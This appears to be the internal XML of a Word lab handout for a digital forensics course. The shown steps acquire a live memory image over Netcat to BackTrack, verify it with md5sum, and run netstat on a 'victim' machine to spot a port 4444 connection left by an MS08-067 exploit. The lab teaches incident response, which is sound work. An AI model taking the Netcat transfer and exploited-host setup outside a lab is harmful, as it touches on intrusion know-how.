          <w:ilvl w:val="0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Acquire Live Image (Part 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64235115" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Note</w:t>
      </w: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39EA7E60" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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You will see a message that physical memory is being copied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF0A5B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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The Black Screen will close once the copy process is finished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3D2AF7" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Wait until the copy process is finished before continuing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A5FA68" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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4DCF628D" wp14:editId="28048A5A">
            <wp:extent cx="4819650" cy="3944745"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.45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987" cy="3947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435DB" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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6C12F6BC" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Before continue, Make sure the previous step is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9084F5" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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79496BD0" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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On BackTrack, go to the terminal window where you started Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA0F57" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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cd /var/forensics/images/WV01_MS08067_VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB2AFC" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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md5sum WV01_VNC.dd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DCF018" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3ADCC" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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echo "Your Name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515F464C" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3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Replace the string "Your Name" with your actual name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18AD9F" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3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E.g., echo "John Gray"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C988B4" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Proof of Lab Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8E0FFF" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Do a PrtScn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0882BA" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Paste into the same word document as Part 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BFDC0" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Upload to Moodle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259282F9" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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513C61FB" wp14:editId="1487B85F">
            <wp:extent cx="4791075" cy="4043423"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.46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198" cy="40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7443B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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11C140A3" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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View Network Connections on the Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD95F58" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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572B85CD" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Go back to the Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB8EEED" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Start --&gt; Accessories --&gt; Command Prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B2D1B0" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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netstat -nao</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272333BE" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Note</w:t>
      </w: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0C84BB98" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2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The highlighted line shows a connection on port 4444 on the Victim machine with a process ID of 1048.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1D7934" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2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shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w: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, the PID might be different in your case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BFA892" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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35B8D45A" wp14:editId="0EB7513F">
            <wp:extent cx="4810125" cy="3912542"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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w.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.47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692" cy="391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29300" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:p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38BE360D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeas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eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Section: Proof of Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C5C66" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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645F40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Cut and Paste a screen shot found in Section 4, Step 9 and Section 5, Step 10 in a word and upload to Moodle. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E1A06D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FBC7CF9" w14:textId="77777777" w:rsidR="005253C4" w:rsidRDefault="000F0034"/>
    <w:sectPr w:rsidR="005253C4" w:rsidSect="00645F40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B74D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0ADCD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BE62E74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B89CE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>
    <w:nsid w:val="26C80E6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEDAF6D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>
    <w:nsid w:val="30987065"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F12B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245135C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2489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1BA0100"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="184C9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7CB2F4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B54F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2A500F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EC80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4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5">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2"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</w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4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7">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2"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</w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="7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10">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2"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</w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0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13">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2"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</w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="5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16">
    <w:abstractNumId w:val="5"/>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2"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</w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="5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18">
    <w:abstractNumId w:val="5"/>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2"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</w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="6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3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6017"/>
    <w:rsid w:val="000F0034"/>
    <w:rsid w:val="00106017"/>
    <w:rsid w:val="001602AE"/>
    <w:rsid w:val="001B1CE7"/>
    <w:rsid w:val="00294404"/>
    <w:rsid w:val="003A3C9D"/>
    <w:rsid w:val="005D7581"/>
    <w:rsid w:val="00976EDB"/>
    <w:rsid w:val="00A5553A"/>
    <w:rsid w:val="00C9095C"/>
    <w:rsid w:val="00D406C3"/>
    <w:rsid w:val="00D94B0D"/>
    <w:rsid w:val="00E36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3134A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4B0D"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"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ww.e-fense.com/products.php" TargetMode="External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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.computersecuritystudent.com/FORENSICS/VOLATILITY/VOLATILITY2_0/lesson1/index.html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33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg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21</Pages>
  <Words>855</Words>
  <Characters>4879</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>40</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5723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2016-05-12T23:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-13T13:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>